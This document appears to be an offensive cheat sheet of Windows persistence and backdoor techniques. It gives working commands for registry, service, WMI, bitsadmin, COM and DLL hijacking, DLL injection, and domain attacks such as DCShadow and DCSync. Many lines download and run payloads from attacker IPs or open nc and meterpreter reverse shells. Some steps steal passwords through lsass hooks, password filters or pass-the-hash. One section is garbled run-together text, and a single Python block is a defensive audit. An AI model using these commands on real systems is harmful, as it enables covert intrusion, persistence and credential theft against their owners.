Under the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\ create AppCertDlls, and in it a value named Default with data c:\1.dll
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f dll >/root/1.dll
Msf>use exploit/multi/handler
Msf>set payload windows/meterpreter/reverse_tcp
https://cdn.securityxploded.com/download/RemoteDLLInjector.zip
> RemoteDLLInjector64.exe PID c:\1.dll

AppInit_DLLs

Registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows
Set AppInit_DLLs to c:\1.dll
Set LoadAppInit_DLLs to 1

MSF

Msf>use post/windows/manage/reflective_dll_inject
Msf>set session 1
Msf>set pid 1234
Msf>set path c:\\1.dll
Msf>run
&
migrate <pid>
&
Meterpreter>run post/windows/manage/migrate

Logon initialization

Under Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon append to the Userinit value
>Powershell.exe Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name Userinit -value "C:\Windows\system32\userinit.exe,c:\muma.exe"
Under Computer\HKEY_CURRENT_USER\Environment create the value UserInitMprLogonScript with data c:\muma.exe
&
Powershell implementation:
>Set-ExecutionPolicy RemoteSigned
Save the following as a ps1 and run it
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name Userinit -value "C:\Windows\system32\userinit.exe,powershell.exe -nop -w hidden -c $w=new-object net.webclient;$w.proxy=[Net.WebRequest]::GetSystemWebProxy();$w.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $w.downloadstring('http://192.168.2.11:8080/kaMhC1');"
# the powershell reverse-shell payload follows msf's web_delivery module

Screen saver

Computer\HKEY_CURRENT_USER\Control Panel\Desktop
SCRNSAVE.EXE - the default screen saver; change it to the malicious program (back up the setting)
ScreenSaveActive - 1 means the screen saver is enabled, 0 means it is disabled
ScreenSaverTimeout - idle time in seconds before the screen saver starts; default 900 (15 minutes)

MOF

>git clone https://github.com/khr0x40sh/metasploit-modules.git
>mv metasploit-modules/persistence/mof_ps_persist.rb /usr/share/metasploit-framework/modules/post/windows/
>reload_all
>use post/windows/mof_ps_persist
>set payload windows/x64/meterpreter/reverse_tcp
>set lhost 192.168.0.108
>set lport 12345
>set session 1
>run

>use exploit/multi/handler
>set payload windows/x64/meterpreter/reverse_tcp
>set lhost 192.168.0.108
>set lport 12345
>set exitonsession false

It reconnects after a reboot

To remove the backdoor, enter meterpreter and run resource on the generated rc file

Stop MOF
>net stop winmgmt
Delete the folder: C:\WINDOWS\system32\wbem\Repository\
>net start winmgmt

WinRM port reuse

WinRM uses port 5985; it is enabled by default on win2012 and later. To enable it on 2008:
>winrm quickconfig -q
Enable port reuse on 2012
>winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}
On 2008, after enabling WinRM, change the port to 80
>winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}
Connecting to and using the backdoor
Enable WinRM locally and trust the remote host
>winrm quickconfig -q
>winrm set winrm/config/Client @{TrustedHosts="*"}
Run a command
>winrs -r:http://10.1.1.100 -u:administrator -p:password ipconfig /all
Get a cmd shell
>winrs -r:http://10.1.1.100 -u:administrator -p:password cmd

Only administrator is allowed to log in remotely over WinRM; to allow other users, set this registry value
>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

Creating a service

Reboot-persistent nc
>sc create ms binpath= "cmd /K start c:\nc\nc64.exe -d 192.168.0.51 4567 -e cmd.exe" start= delayed-auto error= ignore
Reboot-persistent psh
#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=11111 -f psh-reflection >/var/www/html/xxx.ps1
>sc create ms binpath= "cmd /K start C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -nop -exec bypass -c \"IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/xxx.ps1')\"" start= delayed-auto error= ignore

Reboot-persistent Cobalt strike
Configure a listener and generate the web delivery Powershell script
>sc create ms binpath= "cmd /K start C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.0.107:8080/a'))\"" start= delayed-auto error= ignore

With delayed start it checks in about 2 minutes after boot
>sc delete ms    remove the service
Powershell
>powershell.exe new-service -Name nuoyani -BinaryPathName "C:\WINDOWS\Temp\360.exe" -StartupType Automatic
>$c2='new-';$c3='service -Name nuoyani -DisplayName OrderServ -BinaryPathName "C:\accc.exe" -StartupType Automatic'; $Text=$c2+$c3;IEX(-join $Text)

Bitsadmin

Create a download job
>bitsadmin /create empire
Set the file to download
>bitsadmin /addfile empire %comspec% c:\windows\temp\1.exe
Set the command to run when the transfer completes; place an MSFvenom-generated dll in the temp directory
>bitsadmin /SetNotifyCmdLine empire cmd.exe "cmd.exe /c rundll32 c:\windows\temp\1.dll,0"
(bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://x.com/shell.sct scrobj.dll")
Start the job
>bitsadmin /resume empire
List all users' download jobs
>bitsadmin /list /allusers /verbose

It also reconnects after a reboot

Complete the job
>bitsadmin /complete empire
>bitsadmin /cancel <Job>    // delete one job
>bitsadmin /reset /allusers    // delete all jobs
&
>bitsadmin /create mission
>bitsadmin /addfile mission %comspec% %temp%\cmd.exe
>bitsadmin.exe /SetNotifyCmdLine mission regsvr32.exe "/u /s /i:http://192.168.0.107/shell.sct scrobj.dll"
>bitsadmin /Resume mission

CLR Injection

劫持调用.net程序,开机启动
https://github.com/3gstudent/CLR-Injection/blob/master/CLR-Injection_x64.bat


WMIC可替换为powershell
New-ItemProperty "HKCU:\Environment\" COR_ENABLE_PROFILING -value "1" -propertyType string | Out-NullNew-ItemProperty "HKCU:\Environment\" COR_PROFILER -value "{11111111-1111-1111-1111-111111111111}" -propertyType string | Out-Null
wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1"wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}"certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dllcertutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll deletecertutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dllcertutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dll deleteSET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32REG.EXE ADD %KEY% /VE /T REG_SZ /D "%CD%\msg_x64.dll" /FREG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F SET KEY=HKEY_CURRENT_USER\Software\Classes\WoW6432Node\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32REG.EXE ADD %KEY% /VE /T REG_SZ /D "%CD%\msg.dll" /FREG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F添加全局变量计算机\HKEY_CURRENT_USER\EnvironmentCOR_ENABLE_PROFILING=1COR_PROFILER={11111111-1111-1111-1111-111111111111}注册CLSID计算机\HKEY_CURRENT_USER\Software\Classes\CLSID添加项{11111111-1111-1111-1111-111111111111}和它的子项InprocServer32新建一个键ThreadingModel,键值为:Apartment,默认键值为dll路径劫持explorer.exe>SET COR_ENABLE_PROFILING=1>SET COR_PROFILER={11111111-1111-1111-1111-111111111111}位置(新建)HKEY_CURRENT_USER\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32默认值为恶意DLL新建ThreadingModel值为Apartment

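A defender-side check for the profiler hook above, added here as an example (not code from the original post or from 3gstudent's repository): it takes the user's Environment values and the relevant registry keys as plain dicts, so it runs offline; TRUSTED_PREFIXES and the sample values are assumptions.

```python
import re

CLSID_RE = re.compile(r"^\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$")

# The two InprocServer32 locations the recipe writes (native and WoW6432Node views).
PROFILER_KEY_TEMPLATES = (
    r"HKCU\Software\Classes\CLSID\{clsid}\InprocServer32",
    r"HKCU\Software\Classes\WoW6432Node\CLSID\{clsid}\InprocServer32",
)

# Where a legitimately installed profiler (APM agent, debugger) normally lives.
# Assumption for the demo; adjust to the organisation's software inventory.
TRUSTED_PREFIXES = (r"c:\program files", r"c:\windows\microsoft.net")


def audit_clr_profiler(env, registry):
    """env: {name: value} snapshot of HKCU\\Environment (or the process environment).
    registry: {key path: {value name: data}} snapshot; "" is the (Default) value.
    Returns finding strings; an empty list means no profiler hook is configured."""
    findings = []
    enabled = env.get("COR_ENABLE_PROFILING", "").strip()
    clsid = env.get("COR_PROFILER", "").strip()
    if enabled != "1" and not clsid:
        return findings

    if enabled == "1":
        findings.append("COR_ENABLE_PROFILING=1: every .NET process of this user loads a profiler")
    if not clsid:
        findings.append("COR_ENABLE_PROFILING is set but COR_PROFILER is empty (hook incomplete)")
        return findings
    if not CLSID_RE.match(clsid):
        findings.append("COR_PROFILER is not a CLSID: %r" % clsid)
        return findings

    # Registry key names are case-insensitive (InprocServer32 vs InProcServer32 above).
    lowered = {k.lower(): v for k, v in registry.items()}
    resolved = False
    for template in PROFILER_KEY_TEMPLATES:
        key = template.format(clsid=clsid)
        values = lowered.get(key.lower())
        if values is None:
            continue
        resolved = True
        dll = values.get("", "")
        note = "%s -> %s" % (key, dll or "<no default value>")
        if dll and not dll.lower().startswith(TRUSTED_PREFIXES):
            note += " [DLL outside trusted program directories]"
        findings.append(note)
    if not resolved:
        findings.append("COR_PROFILER %s has no HKCU InprocServer32 key (dangling, or registered under HKLM)" % clsid)
    return findings


# Constructed sample mirroring the recipe above (values from the post, not a real host).
SAMPLE_ENV = {"COR_ENABLE_PROFILING": "1",
              "COR_PROFILER": "{11111111-1111-1111-1111-111111111111}"}
SAMPLE_REGISTRY = {
    r"HKCU\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32":
        {"": r"C:\Users\victim\Downloads\msg_x64.dll", "ThreadingModel": "Apartment"},
}

if __name__ == "__main__":
    for line in audit_clr_profiler(SAMPLE_ENV, SAMPLE_REGISTRY):
        print(line)
```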

COM OBJECT hijacking

CAccPropServicesClass and MMDeviceEnumerator: no administrator privileges and no reboot required.
https://github.com/3gstudent/COM-Object-hijacking
Base64-encode the malicious DLL and write it into the PowerShell script.


After execution it drops two files, the x86 and the x64 DLL, into
%appdata%\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E} and creates {b5f8350b-0548-48b1-a6ee-88bd00b4a5e7} under HKEY_CURRENT_USER\Software\Classes\CLSID\ with a subkey whose default value points to the malicious DLL. Any .NET program that instantiates the object triggers the callback, for example ie or mmc.


Explorer

Registry location: HKCU\Software\Classes\CLSID\
Create the key {42aedc87-2188-41fd-b9a3-0c966feabec1}
Create the subkey InprocServer32
Set its Default value to the absolute path of the malicious DLL: C:\test\1.dll
Create the value: ThreadingModel REG_SZ Apartment

HKCU\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}
HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKCU\Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}
HKCU\Software\Classes\Wow6432Node\CLSID\{BCDE0395-E52F-467C-8E3D-C4579291692E}

Squiblydoo

Create 1.sct:
<?XML version="1.0"?>
<scriptlet>
<registration description="Component" progid="Component.WindowsUpdate" version="1.00" classid="{20002222-0000-0000-0000-000000000002}">
</registration>
<public>
<method name="exec">
</method>
</public>
<script language="JScript">
<![CDATA[
function exec(){ new ActiveXObject('WScript.Shell').Run('calc.exe'); }
]]>
</script>
</scriptlet>
Create the COM object:
>regsvr32.exe /s /i:http://192.168.0.107/1.sct scrobj.dll
Trigger:
>cscript 1.js
1.js (the ProgID must match the one registered in the .sct):
var test = new ActiveXObject("Component.WindowsUpdate");
test.exec()
DLL Hijacking

Hijack 1

Under the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\ExcludeFromKnownDlls add "lpk.dll" (create the key if it does not exist). ExcludeFromKnownDlls disables the KnownDLLs protection for that DLL; a reboot is required.
Finding a hijackable DLL:
1. Start the program.
2. Use Process Explorer to view the DLLs the application loaded after start-up.
3. From the list of loaded DLLs, look for ones that are not present under the KnownDLLs registry key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs
4. Write a hijack DLL for the DLL found in step 3.
5. Put the hijack DLL in the application's directory, restart the application and check whether the hijack succeeded.

When Explorer.exe starts it loads RarExt.dll from the WinRAR folder.
Start an MSF listener.

Copy the DLL into the the-backdoor-factory folder and embed the malicious payload in the original DLL:
>python backdoor.py -f RarExt.dll -s reverse_shell_tcp_inline -P 12138 -H 192.168.0.107
-H and -P are the IP and port the Kali listener uses.

The generated DLL is in the backdoored folder. Upload it to the target and replace the original DLL (keep a backup of the original). A session comes back every time Windows Explorer is opened; survives reboot.


Hijack 2

Tools:
https://github.com/coca1ne/DLL_Hijacker
https://github.com/git20150901/DLLHijack_Detecter
DLL_Hijacker reads the export table of the DLL to be hijacked and generates C++ source directly; recompile it to point at the malicious code. DLLHijack_Detecter lists the DLLs a program loads that are not in KnownDLLs.

MSDTC Service Hijack

Service name MSDTC, display name Distributed Transaction Coordinator. The process msdtc.exe lives in %windir%\system32 (also C:\Windows\System32\wbem\). When the service starts it reads the registry location Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI.
#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.51 LPORT=4444 -f dll -o /var/www/html/oci.dll
Put oci.dll into c:\windows\system32\ and restart the service:
>taskkill /f /im msdtc.exe

Rattler

Automatically finds hijackable DLLs: https://github.com/sensepost/rattler
Usage:
>Rattler_x64.exe calc.exe 1
Lists the DLLs that can be hijacked.

Following the order in which the program searches DLL locations, place the malicious DLL in the program's directory and run the program.


DLL Proxy Hijacking of the Context Menu

The registry path for context-menu (right-click) handlers is HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers; use Autoruns to view the loaded DLLs.

Taking rarext.dll as the example:
Use https://github.com/rek7/dll-hijacking to create the proxy DLL.
Note: edit the location of dumpbin.exe in parse.py.

>python3 parse.py -d rarext.dll

Rename the original DLL to rarext_.dll and rebuild the solution with the output named rarext.dll.
Put both DLLs into the original directory and reboot.

DLL Hijacking via a Scheduled Task COM Handler

function Invoke-ScheduledTaskComHandlerUserTask {
    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]
    Param (
        [Parameter(Mandatory = $True)]
        [ValidateNotNullOrEmpty()]
        [String]$Command,
        [Switch]$Force
    )
    # CLSID of the task's COM handler; the InprocServer32 default value is the DLL that gets loaded
    $ScheduledTaskCommandPath = "HKCU:\Software\Classes\CLSID\{58fb76b9-ac85-4e55-ac04-427593b1d060}\InprocServer32"
    if ($Force -or ((Get-ItemProperty -Path $ScheduledTaskCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)) {
        New-Item $ScheduledTaskCommandPath -Force |
            New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null
    } else {
        Write-Verbose "Key already exists, consider using -Force"
        exit
    }
    if (Test-Path $ScheduledTaskCommandPath) {
        Write-Verbose "Created registry entries to hijack the UserTask"
    } else {
        Write-Warning "Failed to create registry key, exiting"
        exit
    }
}
Invoke-ScheduledTaskComHandlerUserTask -Command "C:\test\testmsg.dll" -Verbose
Survives reboot.

DLL Injection

PowerShell

Generate the DLL:
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=6666 -f dll -o /var/www/html/x.dll
>use exploit/multi/handler
>set payload windows/x64/meterpreter/reverse_tcp
>Powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.105/powersploit/CodeExecution/Invoke-DllInjection.ps1'); Invoke-DllInjection -ProcessID pid -Dll .\1.dll"

InjectProc
Generate the DLL:
#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12138 -f dll -o /var/www/html/qq.dll
#use exploit/multi/handler
#set payload windows/x64/meterpreter/reverse_tcp
Inject into a process with:
>InjectProc.exe dll_inj qq.dll xx.exe    (xx.exe: an existing process)


Persistence via Control Panel Items

Add the DLL to the registry; it is loaded whenever the control command opens the Control Panel.
Compile the following as a DLL (this one only shows a message box as a test):
#include "pch.h"
#include <Windows.h>

// CPlApplet: the entry point the Control Panel calls in every .cpl item
extern "C" __declspec(dllexport) LONG Cplapplet(HWND hwndCpl, UINT msg, LPARAM lParam1, LPARAM lParam2)
{
    MessageBoxA(NULL, "inject control panel.", "Control Panel", 0);
    return 1;
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        Cplapplet(NULL, 0, 0, 0);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\CPLs" /v spotless /d "C:\xxx\dll.dll" /f


DLL Injection via a Custom .NET Garbage Collector

A low-privileged user can make a .NET application load a custom garbage collector (GC). The custom GC is selected with the COMPLUS_GCName environment variable, so pointing that variable at a malicious DLL is enough. The custom GC DLL needs an export named GC_VersionInfo.
Below is a message-box DLL:
#include <Windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

// Filled in when the runtime calls GC_VersionInfo
struct VersionInfo
{
    UINT32 MajorVersion;
    UINT32 MinorVersion;
    UINT32 BuildVersion;
    const char* Name;
};

extern "C" __declspec(dllexport) void GC_VersionInfo(VersionInfo* info)
{
    info->MajorVersion = 0;
    info->MinorVersion = 0;
    info->BuildVersion = 0;
    info->Name = "giao";   // must point at valid memory; the runtime reads it
    MessageBoxA(NULL, "giao", "giao", 0);
}


Afterwards, running any .NET program loads this DLL.

Shellcode can be loaded the same way:
https://github.com/am0nsec/MCGC

Windows FAX DLL Injection

Rename the malicious DLL to fxsst.dll and place it in c:\windows\; explorer.exe will load it.

DSRM + Registry ACL Backdoor

>reg add HKLM\System\CurrentControlSet\Control\Lsa /v DSRMAdminLogonBehavior /t REG_DWORD /d 2
Allows the DSRM account to log on remotely.
https://github.com/HarmJ0y/DAMP
Effect: any user in the domain can read the domain controller's hashes.
Run as SYSTEM:
>psexec.exe -accepteula -s -i -d cmd.exe
On the domain controller:
PS>Add-RemoteRegBackdoor -ComputerName <DC name> -Trustee 'S-1-1-0' -Verbose

On a domain-joined machine:
https://raw.githubusercontent.com/HarmJ0y/DAMP/master/RemoteHashRetrieval.ps1
PS> Get-RemoteLocalAccountHash -ComputerName <DC> -Verbose

On the domain controller:
>reg add HKLM\System\CurrentControlSet\Control\Lsa /v DSRMAdminLogonBehavior /t REG_DWORD /d 2

Pass-the-hash; mimikatz must be started as administrator:
>mimikatz "privilege::debug" "sekurlsa::pth /domain:dc /user:Administrator /ntlm:9f1770aebd442b6b624bdfe9cbc720dd" exit


DCShadow & SID History

http://192.168.0.107/ps/nishang/ActiveDirectory/Set-DCShadowPermissions.ps1
A DCShadow attack changes the AD schema so that a machine in the domain impersonates a domain controller. This script grants the minimum permissions needed for DCShadow by modifying AD objects. Running the script requires DA (Domain Administrator) rights; afterwards the specified user can use mimikatz without DA rights.
Domain controller: dc.zone.com
Domain machine: sub2k8.zone.com
Ordinary domain user: y
On the domain controller:
>Set-DCShadow­Permissions -Fakedc sub2k8 -Object dc -username y -Verbose
Registers sub2k8 as the fake DC and gives user y permission to modify dc's computer object from sub2k8.


On sub2k8, start one mimikatz session as local SYSTEM and another as zone\y.


The SYSTEM window runs the DCShadow attack and modifies dc's computer attributes.
The zone\y window is used to push the change.
Adding a domain admin
Promote the ordinary domain user y to domain admin by changing the primary group identifier:
>lsadump::dcshadow /object:y /attribute:primaryGroupID /value:512



Push from the zone\y window:
>lsadump::dcshadow /push

Querying on the domain controller now shows user y in the Domain Admins group.

Adding a SIDHistory backdoor
Record the domain admin's SID.

>Set-DCShadowPermissions -FakeDC sub2k8 -Object y -Username y -Verbose

>lsadump::dcshadow /object:y /attribute:sidhistory /value:S-1-5-21-2346829310-1781191092-2540298887-500
Push:
>lsadump::dcshadow /push

Test

On the domain controller the SIDHistory can be queried with mimikatz.

Removing the SIDHistory:
PS>Get-ADUser -Filter {name -eq "y"} -Properties sidhistory | foreach {Set-ADUser $_ -remove @{sidhistory="S-1-5-21-2346829310-1781191092-2540298887-500"}}


Removing the permissions
Append -Remove to the Set-DCShadowPermissions command that was entered.


DCSync Backdoor

In Server Manager locate the domain -> View -> Enable Advanced Features -> right-click, Properties -> Security -> grant Everyone Full Control.
>mimikatz.exe "lsadump::dcsync /domain:zone.com /user:administrator" exit

Or add an ACE with PowerView (run on the domain controller):
>Add-DomainObjectAcl -TargetIdentity "DC=ZONE,DC=COM" -PrincipalIdentity <domain user> -Rights DCSync -Verbose

With this account, mimikatz's dcsync can dump credentials from any host in the domain.

Remove the ACE:
>Remove-DomainObjectAcl -TargetIdentity "DC=zone,DC=com" -PrincipalIdentity <user> -Rights DCSync -Verbose

Netsh Helper DLL

https://github.com/outflanknl/NetshHelperBeacon
https://github.com/rtcrowley/Offensive-Netsh-Helper

MSFvenom-generated DLL

Generate a DLL-format payload.

Upload it to the target and run:
>netsh add helper C:\Windows\Temp\help.dll


MSF + web_delivery

The session is not lost when netsh is closed, because PowerShell is what gets invoked.
#use exploit/multi/script/web_delivery
>set target 2            #PSH
>set payload windows/x64/meterpreter/reverse_tcp
>set lhost 192.168.0.107
>set lport 12345

In Visual Studio create an empty DLL project and add an existing file under Source Files:
https://github.com/rtcrowley/Offensive-Netsh-Helper/blob/master/netshlep.cpp
Copy the generated code into the file, add an x64 platform in Configuration Manager, set the configuration type to Dynamic Library and build the solution. Copy the DLL to the target and run:

>netsh add helper helper.dll


MSF & Shellcode

The session is lost when netsh is closed.
https://github.com/outflanknl/NetshHelperBeacon
Generate .c-format shellcode with MSFvenom:
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12345 -f c -o /var/www/html/1.c
Open the project in Visual Studio. On a 64-bit system set the Configuration Manager to a 64-bit project, otherwise 32-bit (right-click the solution, Properties).

Paste the MSF shellcode into the marked place and build the solution.


The DLL is generated under x64/Release in the project directory.
Copy the DLL to the target's system32 directory and run:
>netsh add helper C:\Windows\System32\NetshHelperBeacon.dll

It triggers whenever netsh starts.


MSSQL Backdoor

Registry autorun:
>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/PowerUpSQL/PowerUpSQL.ps1');Get-SQLPersistRegRun -Verbose -Name Update -Command 'c:\windows\temp\Update.exe' -Instance "zone.com\sub2k8""

Callback on MSSQL restart (requires a service restart):
http://192.168.0.107/ps/Powershellery/Stable-ish/MSSQL/Invoke-SqlServer-Persist-StartupSp.psm1
>powershell -ep bypass
>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Powershellery/Stable-ish/MSSQL/Invoke-SqlServer-Persist-StartupSp.psm1')
>Invoke-SqlServer-Persist-StartupSp -Verbose -SqlServerInstance "zone.com\sub2k8" -PsCommand "IEX(new-object net.webclient).downloadstring('http://192.168.0.107/xxxx')"
The remote payload script can be generated with CS/Empire.
>net stop mssqlserver
>net start mssqlserver

Image File Execution Options hijack:
>powershell -nop -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/PowerUpSQL/PowerUpSQL.ps1');Get-SQLPersistRegDebugger -Verbose -FileName sethc.exe -Command "c:\windows\system32\cmd.exe" -Instance "zone.com\sub2k8""

DDL event trigger:
>powershell -exec bypass
>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/PowerUpSQL/Invoke-SqlServer-Persist-TriggerDDL.psm1')
>Invoke-SqlServer-Persist-TriggerDDL -Verbose -SqlServerInstance "zone\sub2k8" -PsCommand "IEX(new-object net.webclient).downloadstring('http://192.168.0.107/xxxx')"
The remote payload file can be generated with CS/Empire.
>Invoke-SqlServer-Persist-TriggerDDL -Verbose -SqlServerInstance "zone\sub2k8" -Remove    # remove the backdoor

NSSM

http://www.nssm.cc/release/nssm-2.24.zip
NSSM wraps an executable as a system service.
>nssm install <service name>
A configuration dialog opens automatically.


Set Path to the PowerShell executable and type the parameters into Arguments.
Start the service:
>nssm start <service name>

A session comes back.

The access also survives a reboot.
Remove the service:
>nssm remove <servicename>


Adding a Signature

https://github.com/secretsquirrel/SigThief
>python sigthief.py -i <file whose signature is copied> -t <malicious file to sign> -o <output file>
>python sigthief.py -i rarext.dll -t rarextdwa.dll -o 1.dll

Metsvc

Meterpreter> run metsvc -A
Creates a randomly named directory with three files under C:\Windows\TEMP and a service named metsvc listening on port 31337.
Connecting to the backdoor:
Msf>use exploit/multi/handler
Msf>set payload windows/metsvc_bind_tcp
Msf>set rhost 192.168.1.2
Msf>set rport 31337
Msf>run
Remove the service:
Meterpreter > run metsvc -r


Persistence

Meterpreter>run persistence -X -i 10 -r 192.168.1.9 -p 4444
-X  run at system start-up
-i  retry the connection every 10 seconds
Connecting to the backdoor:
Msf>use exploit/multi/handler
Msf>set payload windows/meterpreter/reverse_tcp
Msf>set lhost 192.168.1.1
Msf>set lport 4444
Msf>run


HookPasswordChangeNotify

Build with VS2015, with MFC set to "Use MFC in a Static Library", to produce HookPasswordChange.dll.
https://github.com/clymb3r/PowerShell/blob/master/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1
Append the following line to the end of that script:
>Invoke-ReflectivePEInjection -PEPath HookPasswordChange.dll -procname lsass
and save it as HookPasswordChangeNotify.ps1.
Upload HookPasswordChangeNotify.ps1 and HookPasswordChange.dll and run as administrator:
>PowerShell.exe -ExecutionPolicy Bypass -File HookPasswordChangeNotify.ps1
passwords.txt can then be found under C:\Windows\Temp.

Alternatively: https://gitee.com/RichChigga/PasswordchangeNotify
Upload HookPasswordChangeNotify.ps1 and HookPasswordChange.dll and run as administrator:
>PowerShell.exe -ExecutionPolicy Bypass -File HookPasswordChangeNotify.ps1
Create the file system.ini in C:\Windows\System32: the first line is the IP to connect to, the second line the port.



Password Filter DLL

https://github.com/3gstudent/PasswordFilter
Build the solution in Visual Studio, put the DLL under %windir%\system32\, and add Win32Project3 to the Notification Packages value under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa.

>REG QUERY "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages"
>REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages" /t REG_MULTI_SZ /d "scecli\0rassfm\0Win32Project3" /f
After a reboot, every user password change is recorded.


The output file defaults to the root of the C drive; this can be changed in the source.


WMIC Event Subscription

Loads the payload every 30 seconds:
>wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="BotFilter82", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 30 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
>wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23",CommandLineTemplate="<remote launcher (powershell, regsvr32, mshta, etc.)>"
>wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"BotFilter82\"", Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\""

Survives reboot.
Removing the backdoor:
>Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject -Verbose
>Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject -Verbose
>Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose

WMI-Persistence

https://gitee.com/RichChigga/WMI-Persistence
Cobalt Strike -> Payload Generator -> PowerShell (use x64)


Attacks -> Host File: choose the Payload Generator script as the file; the local URI can be anything.

Put the resulting address into the WMI-Persistence script.

# powershell -exec bypass
PS > Import-Module .\WMI-Persistence.ps1
PS > Install-Persistence


PS > Check-WMI
After a reboot the session returns as SYSTEM (wait 4 to 6 minutes).

Custom callback

Attacks -> Host File: choose the exe payload as the file; the local URI can be anything; put wmi.xsl in the web directory.

Edit wmi.xsl:
<?xml version='1.0'?>
<stylesheet
    xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
    xmlns:user="placeholder"
    version="1.0">
<output method="text"/>
    <ms:script implements-prefix="user" language="JScript">
    <![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c certutil -urlcache -split -f http://192.168.0.107/load.jpg %temp%/load.exe & %temp%/load.exe & certutil.exe -urlcache -split -f http://192.168.0.107/load.jpg delete",0);
    ]]>
    </ms:script>
</stylesheet>

